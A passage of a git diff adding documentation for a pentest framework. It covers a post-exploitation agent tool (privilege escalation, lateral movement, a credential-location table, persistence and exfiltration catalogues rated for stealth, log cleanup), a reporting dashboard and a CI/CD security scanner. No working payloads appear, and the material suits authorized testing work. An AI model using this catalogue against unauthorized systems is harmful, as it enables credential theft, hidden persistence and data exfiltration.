| Remote Desktop Protocol | T1021.001 | +| SSH | 22 | Secure Shell | T1021.004 | +| Pass-the-Hash | - | NTLM hash authentication | T1550.002 | +| Pass-the-Ticket | - | Kerberos ticket reuse | T1550.003 | +| DCOM | 135 | Distributed COM | T1021.003 | + +### Credential Harvesting + +#### Linux Locations + +| Source | Path | Access Level | Description | +|--------|------|--------------|-------------| +| Shadow | /etc/shadow | root | Password hashes | +| SSH Keys | ~/.ssh/ | user | Private keys | +| History | ~/.bash_history | user | Command history | +| Config Files | Various | user/root | Application credentials | +| Environment | /proc/*/environ | varies | Environment variables | +| Memory | /proc/*/maps | root | Process memory | + +#### Windows Locations + +| Source | Location | Access Level | Description | +|--------|----------|--------------|-------------| +| SAM | %SystemRoot%\System32\config\SAM | SYSTEM | Local account hashes | +| LSASS | Memory | SYSTEM | Live credentials | +| NTDS | %SystemRoot%\NTDS\ntds.dit | Domain Admin | Domain hashes | +| DPAPI | %AppData%\Microsoft\Protect | user | Protected secrets | +| Credential Manager | Credential Manager | user | Stored passwords | +| Browser | Various | user | Saved passwords | +| Kerberos | Memory | varies | Tickets | +| WiFi | netsh | admin | Network passwords | + +### Persistence Mechanisms + +#### Linux + +| Category | Location | Survival | Detection Risk | +|----------|----------|----------|----------------| +| Cron | /etc/crontab, /var/spool/cron | reboot | medium | +| Systemd | /etc/systemd/system | reboot | medium | +| Shell Profile | ~/.bashrc, ~/.profile | login | low | +| SSH Keys | ~/.ssh/authorized_keys | reboot | low | +| LD Preload | /etc/ld.so.preload | reboot | high | +| PAM | /etc/pam.d/ | reboot | high | +| Init Scripts | /etc/init.d/ | reboot | medium | +| Kernel Module | /lib/modules/ | reboot | high | + +#### Windows + +| Category | Location | Survival | Detection Risk | +|----------|----------|----------|----------------| +| Registry Run | HKLM/HKCU\...\Run | reboot | medium | +| Scheduled Task | Task Scheduler | reboot | medium | +| Service | services.msc | reboot | high | +| WMI Subscription | WMI Repository | reboot | low | +| Startup Folder | %AppData%\...\Startup | login | medium | +| DLL Hijack | Application directories | app restart | low | +| COM Hijack | Registry CLSID | app use | low | +| Print Monitor | Registry | reboot | high | + +### Data Exfiltration Channels + +| Channel | Stealth | Bandwidth | Description | +|---------|---------|-----------|-------------| +| DNS | high | low | DNS tunneling | +| HTTP/HTTPS | medium | high | Web-based exfil | +| ICMP | high | low | Ping tunneling | +| SSH | medium | high | Encrypted tunnel | +| SMB | low | high | File share transfer | +| Cloud | medium | high | Cloud storage APIs | +| Email | medium | medium | SMTP-based exfil | +| Steganography | high | low | Hidden in images | + +## Usage + +### Session Management + +```typescript +import { PostExploitOrchestrator, PostExploitProfiles } from "./pentest/postexploit" + +// Create a new post-exploitation session +const session = await PostExploitOrchestrator.createSession({ + target: "192.168.1.100", + platform: "linux", + currentUser: "www-data", + currentPrivilege: "user", + hostname: "webserver01", + profile: "standard" +}) + +console.log(`Session ID: ${session.id}`) +console.log(`Platform: ${session.platform}`) +console.log(`Profile: ${session.profile}`) + +// Get session status +const status = await PostExploitOrchestrator.getStatus(session.id) +console.log(`Privesc Vectors: ${status.privescVectors}`) +console.log(`Lateral Targets: ${status.lateralTargets}`) +console.log(`Credentials Found: ${status.credentialsDiscovered}`) + +// Complete session +await PostExploitOrchestrator.completeSession(session.id) +``` + +### Privilege Escalation Scan + +```typescript +import { Privesc, LinuxPrivesc, WindowsPrivesc } from "./pentest/postexploit" + +// Get discovery commands +const commands = Privesc.getDiscoveryCommands("linux") +console.log("Discovery Commands:") +for (const cmd of commands) { + console.log(` ${cmd}`) +} + +// Get SUID binary info +const suidBinaries = Privesc.getSUIDBinaryInfo() +for (const binary of suidBinaries) { + console.log(`${binary.name}:`) + console.log(` Technique: ${binary.technique}`) + console.log(` Commands: ${binary.commands.join("; ")}`) + console.log(` GTFOBins: ${binary.gtfobins}`) +} + +// Get sudo exploitation guidance +const sudoExploits = Privesc.getSudoInfo() +for (const exploit of sudoExploits) { + console.log(`${exploit.name}:`) + console.log(` Risk: ${exploit.risk}`) + console.log(` Technique: ${exploit.technique}`) +} + +// Windows service exploitation +const serviceVulns = Privesc.getServiceInfo() +for (const vuln of serviceVulns) { + console.log(`${vuln.name}: ${vuln.description}`) + console.log(` MITRE: ${vuln.mitre.join(", ")}`) +} + +// UAC bypass techniques +const uacBypasses = Privesc.getUACBypassInfo() +for (const bypass of uacBypasses) { + console.log(`${bypass.name}:`) + console.log(` Binary: ${bypass.binary}`) + console.log(` Detection Risk: ${bypass.detectionRisk}`) +} + +// Quick win checks +const quickWins = Privesc.getQuickWinChecks("linux") +for (const check of quickWins) { + console.log(` ${check}`) +} +``` + +### Lateral Movement Discovery + +```typescript +import { Lateral, LateralDiscovery, LateralMethods, LateralPaths } from "./pentest/postexploit" + +// Get discovery commands +const discoveryCommands = Lateral.getDiscoveryCommands("windows") +console.log("Network Discovery:") +for (const cmd of discoveryCommands) { + console.log(` ${cmd}`) +} + +// Get available methods +const methods = Lateral.getMethods("windows") +for (const method of methods) { + console.log(`${method.name}:`) + console.log(` Description: ${method.description}`) + console.log(` Detection Risk: ${method.detectionRisk}`) +} + +// Analyze target +const target = Lateral.analyzeTarget("192.168.1.50", [22, 445, 3389], "dc01") +console.log(`Target: ${target.host}`) +console.log(`Suggested Methods: ${target.suggestedMethods.join(", ")}`) + +// Create movement path +const path = Lateral.createPath("192.168.1.100", "192.168.1.50", "smb", { + credentials: "admin:hash", + credentialType: "hash" +}) +console.log(`Path: ${path.source} -> ${path.destination}`) + +// Quick reference +const quickRef = Lateral.getQuickReference() +console.log(quickRef) +``` + +### Credential Discovery + +```typescript +import { Creds, CredDiscovery, LinuxCreds, WindowsCreds } from "./pentest/postexploit" + +// Get credential locations +const locations = Creds.getLocations("linux") +for (const loc of locations) { + console.log(`${loc.source}:`) + console.log(` Path: ${loc.path}`) + console.log(` Access: ${loc.accessLevel}`) + console.log(` Expected Types: ${loc.expectedTypes.join(", ")}`) +} + +// Get quick commands +const quickCommands = Creds.getQuickCommands("windows") +console.log("Quick Credential Commands:") +for (const cmd of quickCommands) { + console.log(` ${cmd}`) +} + +// Get source-specific commands +const lsassCommands = Creds.getSourceCommands("windows", "lsass") +console.log("LSASS Extraction:") +for (const cmd of lsassCommands) { + console.log(` ${cmd}`) +} + +// Get recommended tools +const tools = Creds.getTools("windows") +console.log("Recommended Tools:") +for (const tool of tools) { + console.log(` - ${tool}`) +} + +// Priority order +const priority = Creds.getPriorityOrder("linux") +console.log("Priority Order:") +for (const item of priority) { + console.log(` ${item}`) +} +``` + +### Persistence Catalog + +```typescript +import { Persistence, PersistenceCatalog, LinuxPersistence, WindowsPersistence } from "./pentest/postexploit" + +// Get all mechanisms +const mechanisms = Persistence.getMechanisms("linux") +for (const mech of mechanisms) { + console.log(`${mech.name}:`) + console.log(` Category: ${mech.category}`) + console.log(` Location: ${mech.location}`) + console.log(` Privilege: ${mech.privilege}`) + console.log(` Survival: ${mech.survival}`) + console.log(` Detection Risk: ${mech.detectionRisk}`) + console.log(` MITRE: ${mech.mitre.join(", ")}`) +} + +// Get mechanism commands +const cronCommands = Persistence.getMechanismCommands("linux", "cron") +console.log("Cron Setup:") +for (const cmd of cronCommands.setup) { + console.log(` ${cmd}`) +} +console.log("Cron Cleanup:") +for (const cmd of cronCommands.cleanup) { + console.log(` ${cmd}`) +} + +// Get recommendations +const recommendations = Persistence.getRecommendations("windows", { + privilege: "admin", + stealth: true +}) +console.log("Recommended:") +for (const rec of recommendations) { + console.log(` - ${rec}`) +} +``` + +### Data Exfiltration + +```typescript +import { Exfil, DataTargets, ExfilChannels } from "./pentest/postexploit" + +// Get discovery commands +const exfilCommands = Exfil.getDiscoveryCommands("windows") +console.log("Data Discovery:") +for (const cmd of exfilCommands) { + console.log(` ${cmd}`) +} + +// Get stealthy channels +const stealthyChannels = Exfil.getStealthyChannels() +console.log(`Stealthy Channels: ${stealthyChannels.join(", ")}`) + +// Get high bandwidth channels +const highBwChannels = Exfil.getHighBandwidthChannels() +console.log(`High Bandwidth: ${highBwChannels.join(", ")}`) + +// Get channel details +const dnsDetails = Exfil.getChannelDetails("dns") +console.log(`DNS Exfil:`) +console.log(` Stealth: ${dnsDetails.stealth}`) +console.log(` Bandwidth: ${dnsDetails.bandwidth}`) +console.log(` Tools: ${dnsDetails.tools.join(", ")}`) + +// Quick reference +const exfilRef = Exfil.getQuickReference() +console.log(exfilRef) +``` + +### Cleanup and Artifact Tracking + +```typescript +import { Cleanup, ArtifactTracking, LogCleanup, CleanupChecklist } from "./pentest/postexploit" + +// Generate cleanup checklist +const checklist = Cleanup.generateChecklist("linux", session.artifacts, { + includeLogGuidance: true +}) + +for (const item of checklist) { + const status = item.verified ? "[x]" : "[ ]" + console.log(`${status} ${item.description}`) + console.log(` Command: ${item.command}`) + console.log(` Priority: ${item.priority}`) +} + +// Get log cleanup guidance +const logGuidance = Cleanup.formatLogGuidance("linux") +console.log(logGuidance) + +// Format artifacts +const artifactSummary = Cleanup.formatArtifacts(session.artifacts) +console.log(artifactSummary) + +// Get quick reference +const cleanupRef = Cleanup.getQuickReference("windows") +console.log(cleanupRef) +``` + +### LinPEAS/WinPEAS Parser + +```typescript +import { Parsers, LinPEASParser, WinPEASParser } from "./pentest/postexploit" + +// Parse LinPEAS output +const linpeasOutput = await fs.readFile("/tmp/linpeas_output.txt", "utf-8") +const linpeasResult = LinPEASParser.parse(linpeasOutput) + +console.log(`SUID Binaries: ${linpeasResult.suidBinaries.length}`) +console.log(`Sudo Entries: ${linpeasResult.sudoEntries.length}`) +console.log(`Capabilities: ${linpeasResult.capabilities.length}`) +console.log(`Interesting Files: ${linpeasResult.interestingFiles.length}`) + +// Extract privesc vectors +const vectors = LinPEASParser.extractPrivescVectors(linpeasResult) +for (const vector of vectors) { + console.log(`[${vector.risk}] ${vector.name}`) + console.log(` Category: ${vector.category}`) + console.log(` Technique: ${vector.technique}`) +} + +// Parse WinPEAS output +const winpeasOutput = await fs.readFile("/tmp/winpeas_output.txt", "utf-8") +const winpeasResult = WinPEASParser.parse(winpeasOutput) + +console.log(`Services: ${winpeasResult.services.length}`) +console.log(`Scheduled Tasks: ${winpeasResult.scheduledTasks.length}`) +console.log(`Token Privileges: ${winpeasResult.tokenPrivileges.length}`) +console.log(`Registry Issues: ${winpeasResult.registryIssues.length}`) + +// Auto-detect and parse +const autoResult = Parsers.parse("auto", output) +const formatted = Parsers.formatResults("auto", autoResult) +console.log(formatted) +``` + +## Tool Actions + +| Action | Description | +|--------|-------------| +| `session` | Create or manage a post-exploitation session | +| `privesc` | Scan for privilege escalation vectors | +| `lateral` | Discover lateral movement targets and paths | +| `creds` | Discover credential storage locations | +| `persist` | Catalog persistence mechanisms | +| `exfil` | Discover data targets and exfiltration channels | +| `cleanup` | Generate cleanup guidance and checklist | +| `parse` | Parse LinPEAS/WinPEAS output | +| `status` | Get session status and summary | +| `profiles` | List available assessment profiles | +| `assess` | Run full assessment based on profile | +| `list` | List sessions | + +## Assessment Profiles + +| Profile | Privesc | Lateral | Creds | Persist | Exfil | Cleanup | Stealth | +|---------|---------|---------|-------|---------|-------|---------|---------| +| `discovery` | basic | enum | passive | catalog | discover | track | yes | +| `quick` | critical | basic | passive | no | no | track | no | +| `standard` | full | full | guided | catalog | full | full | no | +| `thorough` | deep | deep | deep | catalog | full | full | no | +| `stealth` | passive | passive | passive | no | passive | full | yes | + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.postexploit.session_started` | Session created | +| `pentest.postexploit.session_completed` | Session finished | +| `pentest.postexploit.privesc_vector_found` | Privesc vector discovered | +| `pentest.postexploit.lateral_target_discovered` | Lateral movement target found | +| `pentest.postexploit.credential_discovered` | Credential location found | +| `pentest.postexploit.persistence_opportunity` | Persistence option identified | +| `pentest.postexploit.data_target_found` | Sensitive data target discovered | +| `pentest.postexploit.artifact_created` | Artifact tracked | +| `pentest.postexploit.cleanup_guidance_generated` | Cleanup checklist created | + +## Data Types + +### PostExploitSession + +```typescript +{ + id: string + target: string + platform: "linux" | "windows" + currentUser: string + currentPrivilege: "user" | "admin" | "root" | "system" + hostname?: string + domain?: string + profile: ProfileId + status: "running" | "completed" | "failed" + privescVectors: PrivescVector[] + lateralTargets: LateralTarget[] + lateralPaths: LateralPath[] + credentialLocations: CredentialLocation[] + persistenceMechanisms: PersistenceMechanism[] + dataTargets: DataTarget[] + exfilChannels: ExfilChannel[] + artifacts: Artifact[] + startedAt: number + endedAt?: number +} +``` + +### PrivescVector + +```typescript +{ + id: string + category: "suid" | "sudo" | "kernel" | "cron" | "service" | "registry" | "token" | "uac_bypass" | ... + platform: "linux" | "windows" + name: string + description: string + risk: "critical" | "high" | "medium" | "low" + exploitability: "trivial" | "easy" | "moderate" | "difficult" + target: string + technique: string + commands: string[] + prerequisites: string[] + detectionRisk: "low" | "medium" | "high" + gtfobins?: string + lolbas?: string + mitre: string[] + discoveredAt: number +} +``` + +### LateralPath + +```typescript +{ + id: string + source: string + destination: string + method: "smb" | "wmi" | "ssh" | "rdp" | "winrm" | "pass_the_hash" | "pass_the_ticket" | ... + credentials?: string + credentialType?: "password" | "hash" | "ticket" | "key" + risk: "critical" | "high" | "medium" | "low" + detectionRisk: "low" | "medium" | "high" + commands: string[] + tested: boolean + successful: boolean + notes?: string + mitre: string[] + discoveredAt: number +} +``` + +### PersistenceMechanism + +```typescript +{ + id: string + category: PersistenceCategory + platform: "linux" | "windows" + name: string + description: string + location: string + privilege: "user" | "admin" | "system" + survival: "reboot" | "logout" | "service_restart" + detectionRisk: "low" | "medium" | "high" + commands: string[] + cleanup: string[] + indicators: string[] + mitre: string[] + catalogedAt: number +} +``` + +### Artifact + +```typescript +{ + id: string + sessionId: string + type: "file" | "process" | "registry" | "service" | "scheduled_task" | "user" | "log_entry" + path: string + description: string + host: string + createdBy: string + createdAt: number + cleaned: boolean + cleanedAt?: number + cleanupCommand?: string + verifyCommand?: string +} +``` + +## External Tools Integration + +### Recommended Tools + +| Tool | Platform | Purpose | +|------|----------|---------| +| LinPEAS | Linux | Privilege escalation enumeration | +| WinPEAS | Windows | Privilege escalation enumeration | +| pspy | Linux | Process monitoring without root | +| Mimikatz | Windows | Credential extraction | +| Rubeus | Windows | Kerberos operations | +| Impacket | Both | Network protocols toolkit | +| BloodHound | Windows | AD path analysis | +| PowerUp | Windows | PowerShell privesc checks | +| BeRoot | Both | Privesc scanner | + +### GTFOBins & LOLBAS + +- **GTFOBins**: https://gtfobins.github.io/ - Unix binaries exploitation +- **LOLBAS**: https://lolbas-project.github.io/ - Windows living-off-the-land binaries + +## Example Use Cases + +### Use Case 1: Linux Post-Exploitation + +```bash +# Create session +postexploit session target=192.168.1.100 platform=linux user=www-data + +# Scan for privilege escalation +postexploit privesc sessionId= + +# Parse LinPEAS output +postexploit parse tool=linpeas file=/tmp/linpeas.txt sessionId= + +# Discover credentials +postexploit creds sessionId= + +# Generate cleanup checklist +postexploit cleanup sessionId= +``` + +### Use Case 2: Windows Post-Exploitation + +```bash +# Create session +postexploit session target=192.168.1.50 platform=windows user=DOMAIN\\user privilege=user + +# Full assessment +postexploit assess sessionId= + +# Parse WinPEAS output +postexploit parse tool=winpeas file=C:\\temp\\winpeas.txt sessionId= + +# Discover lateral movement targets +postexploit lateral sessionId= + +# Get session status +postexploit status sessionId= +``` + +### Use Case 3: Stealth Assessment + +```bash +# Create stealth session +postexploit session target=10.0.0.100 platform=linux user=app profile=stealth + +# Run stealth assessment (passive only) +postexploit assess sessionId= + +# Track artifacts +postexploit status sessionId= + +# Comprehensive cleanup +postexploit cleanup sessionId= +``` + +## Storage + +Session data is persisted in: + +``` +pentest/postexploit/ + sessions/ + session_abc123.json # Session data + vectors/ + privesc_def456.json # Privesc vectors + paths/ + lateral_ghi789.json # Lateral paths + credentials/ + cred_jkl012.json # Credential locations + mechanisms/ + persist_mno345.json # Persistence mechanisms + artifacts/ + artifact_pqr678.json # Tracked artifacts +``` + +## Testing + +Run the tests: + +```bash +bun test test/pentest/postexploit.test.ts +``` + +## Integration + +The tool is registered in `src/tool/registry.ts`: +- `PostExploitTool` - Available as `postexploit` tool + +Exports available from `src/pentest/index.ts`: +- All types: `PostExploitTypes` +- Events: `PostExploitEvents` +- Storage: `PostExploitStorage` +- Profiles: `PostExploitProfiles` +- Orchestrator: `PostExploitOrchestrator` +- Tool: `PostExploitTool` +- Privesc: `Privesc`, `LinuxPrivesc`, `WindowsPrivesc` +- Lateral: `Lateral`, `LateralDiscovery`, `LateralMethods`, `LateralPaths` +- Creds: `Creds`, `CredDiscovery`, `LinuxCreds`, `WindowsCreds` +- Persistence: `Persistence`, `PersistenceCatalog`, `LinuxPersistence`, `WindowsPersistence` +- Exfil: `Exfil`, `DataTargets`, `ExfilChannels` +- Cleanup: `Cleanup`, `ArtifactTracking`, `LogCleanup`, `CleanupChecklist` +- Parsers: `Parsers`, `LinPEASParser`, `WinPEASParser` + +## MITRE ATT&CK Mapping + +All techniques are mapped to MITRE ATT&CK framework: + +| Tactic | Techniques | +|--------|------------| +| Privilege Escalation | T1548, T1068, T1134, T1574 | +| Lateral Movement | T1021, T1047, T1550 | +| Credential Access | T1003, T1552, T1555 | +| Persistence | T1053, T1547, T1543, T1546 | +| Collection | T1005, T1039, T1074 | +| Exfiltration | T1048, T1041, T1567 | +| Defense Evasion | T1070, T1112, T1564 | + +## Safety Design + +1. **Guidance-First**: Provides commands to understand, not automated execution +2. **Explicit Confirmation**: Artifact creation requires user confirmation +3. **Artifact Tracking**: All created artifacts tracked for cleanup +4. **Risk Assessment**: Each technique includes detection risk rating +5. **MITRE Mapping**: All techniques mapped to ATT&CK for reporting +6. **Cleanup Verification**: Comprehensive cleanup checklists diff --git a/docs/PHASE17-reporting-dashboard.md b/docs/PHASE17-reporting-dashboard.md new file mode 100644 index 00000000000..04009063b8a --- /dev/null +++ b/docs/PHASE17-reporting-dashboard.md @@ -0,0 +1,346 @@ +# Phase 17: Reporting Dashboard + +## Overview + +Phase 17 implements a full web-based reporting dashboard for the opencode pentest framework with real-time scan monitoring, finding trend visualization, executive summary generation, remediation tracking, and compliance mapping (PCI-DSS, HIPAA, SOC2). + +## Technology Stack + +- **Frontend**: SolidJS + Vite + Tailwind CSS +- **Backend**: Hono routes integrated with existing server +- **Real-time**: Server-Sent Events (SSE) for live updates +- **Charts**: Custom SVG-based charts (Pie, Line, Bar, Radar) +- **Routing**: @solidjs/router v0.15+ (file-based lazy loading) + +### Dependencies + +```json +{ + "solid-js": "^1.9.0", + "@solidjs/router": "^0.15.0", + "vite": "^6.0.0", + "vite-plugin-solid": "^2.11.0", + "tailwindcss": "^3.4.0", + "autoprefixer": "^10.4.0", + "postcss": "^8.5.0" +} +``` + +## Features + +### Dashboard Overview +- Total findings count with severity breakdown +- Critical/High open issues alert +- Scan activity (24h) +- Remediation metrics (7d mitigated, avg time to fix) +- Severity distribution pie chart +- Status distribution bar +- Finding trends line chart (30 days) +- Quick action cards + +### Findings Management +- List all findings with filters (severity, status, target) +- Finding detail panel with full information +- Status updates (confirm, mitigate, false positive) +- Real-time updates via SSE +- Delete functionality + +### Scans View +- List all scans with type, target, hosts, status, duration +- Active scan tracking with live indicator +- Scan detail panel with host/port information +- Real-time updates for running scans + +### Monitors View +- List all monitors with status, schedule, run count +- Trigger immediate runs +- Run history with findings count +- Running monitor indicators +- Monitor detail panel with configuration + +### Compliance Assessment +- Framework selection (PCI-DSS v4.0, HIPAA, SOC2) +- Auto-mapping findings to compliance controls +- Compliance scoring with percentage +- Category-level breakdown +- Radar chart visualization +- Control-level assessment details +- Gap identification + +### Report Generation +- Executive summary reports + - Risk score calculation + - Critical findings highlights + - Top targets analysis + - Recommendations generation +- Technical reports + - Findings grouped by target + - Full evidence and remediation +- Compliance reports + - Framework assessment results + - Compliance gaps + - Control-level details +- JSON export + +## File Structure + +``` +packages/opencode/src/dashboard/ +├── vite.config.ts +├── index.html +├── package.json +├── tsconfig.json +├── tailwind.config.js +├── postcss.config.js +├── src/ +│ ├── index.tsx +│ ├── App.tsx +│ ├── api/ +│ │ ├── client.ts # API client (fetch wrapper) +│ │ └── sse.ts # SSE event listener +│ ├── stores/ +│ │ ├── findings.ts # Findings state store +│ │ ├── scans.ts # Scans state store +│ │ ├── monitors.ts # Monitors state store +│ │ └── compliance.ts # Compliance state store +│ ├── components/ +│ │ ├── layout/ +│ │ │ ├── Sidebar.tsx +│ │ │ ├── Header.tsx +│ │ │ └── Layout.tsx +│ │ ├── charts/ +│ │ │ ├── SeverityPie.tsx +│ │ │ ├── TrendLine.tsx +│ │ │ ├── StatusBar.tsx +│ │ │ └── ComplianceRadar.tsx +│ │ └── shared/ +│ │ ├── SeverityBadge.tsx +│ │ ├── StatusBadge.tsx +│ │ └── DataTable.tsx +│ ├── pages/ +│ │ ├── Dashboard.tsx +│ │ ├── Findings.tsx +│ │ ├── Scans.tsx +│ │ ├── Monitors.tsx +│ │ ├── Compliance.tsx +│ │ └── Reports.tsx +│ └── styles/ +│ └── dashboard.css + +packages/opencode/src/server/ +├── server.ts # Modified - mounts dashboard routes +└── dashboard.ts # Dashboard API routes + +packages/opencode/src/pentest/compliance/ +├── types.ts # Compliance type definitions +├── frameworks/ +│ ├── index.ts # Framework registry +│ ├── pci-dss.ts # PCI-DSS v4.0 controls (~64) +│ ├── hipaa.ts # HIPAA controls (~42) +│ └── soc2.ts # SOC2 controls (~33) +├── mapper.ts # Finding-to-control mapper +├── scorer.ts # Compliance score calculator +└── index.ts # Module exports +``` + +## API Endpoints + +### Findings +``` +GET /pentest/findings # List with filters +GET /pentest/findings/:id # Get single finding +PATCH /pentest/findings/:id # Update status/notes +DELETE /pentest/findings/:id # Delete finding +``` + +### Scans +``` +GET /pentest/scans # List scans +GET /pentest/scans/:id # Get scan details +``` + +### Statistics +``` +GET /pentest/stats/overview # Dashboard overview stats +GET /pentest/stats/severity # Severity distribution +GET /pentest/stats/trends # Finding trends over time +``` + +### Monitors +``` +GET /pentest/monitors # List monitors +GET /pentest/monitors/:id # Get monitor details +POST /pentest/monitors/:id/run # Trigger immediate run +GET /pentest/monitors/:id/runs # Run history +``` + +### Reports +``` +POST /pentest/reports # Generate report +GET /pentest/reports/:id # Get report content +``` + +### Compliance +``` +GET /pentest/compliance/frameworks # List frameworks +GET /pentest/compliance/:framework # Get framework controls +GET /pentest/compliance/:framework/map # Finding-to-control mapping +POST /pentest/compliance/:framework/assess # Run assessment +``` + +## Real-time Integration + +Uses existing SSE at `/global/event` for live updates: + +```typescript +// Events subscribed: +"pentest.finding_created" -> Add to findings list +"pentest.finding_updated" -> Update finding in UI +"pentest.scan_started" -> Show active scan +"pentest.scan_completed" -> Refresh scan list +"pentest.monitor.run_started" -> Show running indicator +"pentest.monitor.run_completed" -> Update monitor history +"pentest.monitor.run_failed" -> Clear running indicator +``` + +## Compliance Frameworks + +### PCI-DSS v4.0 +- 12 requirement categories +- ~64 security controls +- Coverage: Network security, secure configurations, data protection, encryption, access control, logging, testing, policies + +### HIPAA Security Rule +- 5 safeguard categories (Administrative, Physical, Technical, Organizational, Policies) +- ~42 controls +- Coverage: Access control, audit controls, transmission security, integrity, authentication + +### SOC 2 +- 5 Trust Service Criteria (Security, Availability, Processing Integrity, Confidentiality, Privacy) +- ~33 controls +- Coverage: Risk assessment, monitoring, access control, incident response, change management + +## Auto-Mapping Logic + +Findings are mapped to controls via: +1. **Keyword matching** - Title, description against control keywords +2. **Service matching** - Finding service against control service list +3. **Severity alignment** - Finding severity matches control severity list +4. **CWE correlation** - CWE IDs in finding text matched to control CWEs + +Confidence levels: +- **High**: Score >= 25 (multiple strong matches) +- **Medium**: Score 15-24 (moderate matches) +- **Low**: Score < 15 (weak matches) + +## Development + +### Start Development Server +```bash +cd packages/opencode/src/dashboard +bun install +bun run dev +``` + +Development server runs at: `http://localhost:5173/dashboard/` + +### Build for Production +```bash +cd packages/opencode/src/dashboard +bun run build +``` + +Build output (~140 kB total): +- `dist/index.html` - Entry point +- `dist/assets/index-*.css` - Tailwind styles (~22 kB) +- `dist/assets/index-*.js` - Main bundle (~48 kB) +- `dist/assets/*.js` - Lazy-loaded page chunks + +### Access Dashboard (Production) +``` +http://localhost:4096/dashboard +``` + +Requires the main opencode server to be running to serve the API endpoints. + +## Types + +### Overview Stats Response +```typescript +interface OverviewStats { + findings: { + total: number + bySeverity: Record + byStatus: Record + openCriticalHigh: number + } + scans: { + total: number + last24h: number + activeMonitors: number + } + remediation: { + mitigatedLast7d: number + avgTimeToMitigate: number + } +} +``` + +### Compliance Assessment +```typescript +interface ComplianceAssessment { + framework: "pci-dss" | "hipaa" | "soc2" + timestamp: number + controls: Array<{ + control: ComplianceControl + status: "pass" | "fail" | "partial" | "not_assessed" + findings: string[] + notes?: string + }> + score: { + total: number + passed: number + failed: number + partial: number + notAssessed: number + percentage: number + } +} +``` + +## Integration Points + +1. **Server Integration**: Dashboard routes mounted in `server.ts` +2. **Pentest Module**: Compliance module exported from `pentest/index.ts` +3. **Storage**: Uses existing file-based storage at `["pentest", ...]` paths +4. **Events**: Integrates with existing Bus/SSE event system +5. **Monitoring**: Accesses monitor storage for scheduler integration + +## Summary + +| Component | Files | Description | +|-----------|-------|-------------| +| Frontend | 24 | SolidJS pages, components, stores, API client | +| Backend | 1 | Hono dashboard routes (~500 lines) | +| Compliance | 8 | Types, frameworks, mapper, scorer | +| **Total** | **33** | **~2,950 lines of code** | + +### Compliance Controls + +| Framework | Controls | Categories | +|-----------|----------|------------| +| PCI-DSS v4.0 | 64 | 12 requirements | +| HIPAA | 42 | 5 safeguards | +| SOC 2 | 33 | 5 Trust Service Criteria | +| **Total** | **139** | - | + +## Future Enhancements + +- PDF report export +- Custom compliance framework definitions +- Historical compliance trend tracking +- Email/Slack notifications +- Dark/light theme toggle +- Dashboard widget customization +- Finding comments/collaboration +- Bulk finding operations diff --git a/docs/PHASE18-cicd-security.md b/docs/PHASE18-cicd-security.md new file mode 100644 index 00000000000..ff55798ac05 --- /dev/null +++ b/docs/PHASE18-cicd-security.md @@ -0,0 +1,468 @@ +# Phase 18: CI/CD Security Integration + +## Overview + +Phase 18 implements a comprehensive CI/CD pipeline security scanner module for the pentest framework. It provides security analysis for GitHub Actions, GitLab CI, and Jenkins pipelines with support for secret detection, permission analysis, injection vulnerability detection, supply chain security checks, and SAST tool integration. + +## Features + +### Pipeline Providers + +- **GitHub Actions**: Full workflow YAML parsing with jobs, steps, permissions, triggers +- **GitLab CI/CD**: Pipeline parsing including stages, includes, variables, rules +- **Jenkins**: Declarative and scripted Jenkinsfile parsing with shared library detection + +### Security Checks + +| Check Category | Description | Severity Range | +|---------------|-------------|----------------| +| **Secrets** | Hardcoded API keys, tokens, passwords, private keys | Critical-Medium | +| **Permissions** | Overly permissive GITHUB_TOKEN, write-all access | Critical-Low | +| **Injection** | Command injection via PR titles/bodies, commit messages | Critical-High | +| **Supply Chain** | Unpinned actions, untrusted third-party dependencies | High-Medium | +| **Misconfiguration** | Self-hosted runner risks, missing security scans | High-Medium | + +### SAST Integration + +- **Semgrep**: Configurable rulesets for CI/CD security patterns +- **Gitleaks**: Secret detection with entropy analysis and git history scanning + +### Security Gates + +Configurable pass/fail criteria with: +- Severity thresholds (max critical, high, medium, low) +- Category-specific rules (fail on secrets, warn on supply chain) +- Custom rule definitions + +## Module Structure + +``` +packages/opencode/src/pentest/cicd/ +├── index.ts # Module exports +├── types.ts # Zod schemas (~450 lines) +├── events.ts # Bus events (~100 lines) +├── storage.ts # Persistence layer (~200 lines) +├── profiles.ts # Scan profiles (~180 lines) +├── orchestrator.ts # Main scan coordination (~350 lines) +├── tool.ts # Agent tool definition (~280 lines) +├── gates.ts # Security gate enforcement (~250 lines) +│ +├── providers/ +│ ├── index.ts # Provider exports +│ ├── base.ts # Base provider interface (~180 lines) +│ ├── github.ts # GitHub Actions analyzer (~350 lines) +│ ├── gitlab.ts # GitLab CI/CD analyzer (~300 lines) +│ └── jenkins.ts # Jenkins pipeline analyzer (~575 lines) +│ +├── checks/ +│ ├── index.ts # Check exports (~120 lines) +│ ├── secrets.ts # Secret detection (~270 lines) +│ ├── permissions.ts # Permission analysis (~280 lines) +│ ├── injection.ts # Command injection risks (~320 lines) +│ └── supply-chain.ts # Supply chain checks (~270 lines) +│ +└── sast/ + ├── index.ts # SAST orchestration (~280 lines) + ├── semgrep.ts # Semgrep integration (~410 lines) + └── gitleaks.ts # Gitleaks integration (~400 lines) + +Total: ~21 files, ~5,300+ lines +``` + +## Tool Usage + +### Actions + +```bash +# Discover CI/CD pipelines +cicd discover target="/path/to/repo" + +# Full security scan +cicd scan target="/path/to/repo" profile="standard" + +# Secret detection only +cicd check-secrets target="/path/to/repo" + +# Permission analysis only +cicd check-permissions target="/path/to/repo" + +# SAST tools +cicd sast target="/path/to/repo" tools=["semgrep","gitleaks"] + +# Security gate evaluation +cicd gate scanId="cicd_xxx" + +# List profiles +cicd profiles +``` + +### Scan Profiles + +| Profile | Checks | SAST | Gate | Use Case | +|---------|--------|------|------|----------| +| discovery | - | - | - | Enumerate pipelines only | +| quick | secrets, permissions | - | - | Fast assessment | +| standard | all checks | - | yes | Balanced scan | +| thorough | all checks | yes | yes | Full audit | +| compliance | all checks | - | yes | Regulatory checks | + +## Key Types + +### CICDScanResult + +```typescript +interface CICDScanResult { + id: string + target: string + profile: ProfileId + status: Status + pipelines: PipelineConfig[] + findings: CICDFinding[] + gateResult?: GateResult + sastResults: SASTResult[] + stats: ScanStats +} +``` + +### CICDFinding + +```typescript +interface CICDFinding { + id: string + category: FindingCategory // secrets | permissions | injection | supply-chain | ... + severity: Severity // critical | high | medium | low | info + title: string + description: string + file: string + line?: number + pipeline?: string + job?: string + remediation?: string + cwe?: string +} +``` + +### GateConfig 